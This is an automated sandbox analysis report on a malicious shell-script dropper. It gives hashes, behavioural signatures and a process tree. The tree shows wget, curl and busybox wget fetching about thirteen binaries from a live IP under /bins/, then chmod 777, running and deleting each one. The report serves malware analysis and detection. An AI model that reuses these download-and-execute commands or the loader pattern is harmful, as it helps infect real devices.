Analysis
-
max time kernel
22s -
max time network
23s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 783 chmod 789 chmod 813 chmod 770 chmod 692 chmod 735 chmod 747 chmod 795 chmod 801 chmod 807 chmod 819 chmod 676 chmod 827 chmod -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n 677 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr 694 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij 736 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR 748 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK 771 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll 784 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD 790 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd 796 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv 802 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI 808 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 814 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH 820 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb 828 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv curl File opened for modification /tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI curl File opened for modification /tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4 curl File opened for modification /tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH curl File opened for modification /tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n curl File opened for modification /tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR curl File opened for modification /tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD curl File opened for modification /tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll curl File opened for modification /tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd curl File opened for modification /tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb curl File opened for modification /tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr curl File opened for modification /tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij curl File opened for modification /tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK curl
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:652
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:675
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:676
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:677
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:678
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:679
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:687
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:694
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:695
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:696
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:730
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:737
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:738
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:742
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:749
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:751
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:764
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:773
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:774
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:782
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:785
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:786
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:788
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:791
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:792
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:794
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:797
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:798
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:800
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:803
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:804
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:806
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:809
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:810
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:812
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:815
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:816
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:818
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:821
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:826
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:829
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:830
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97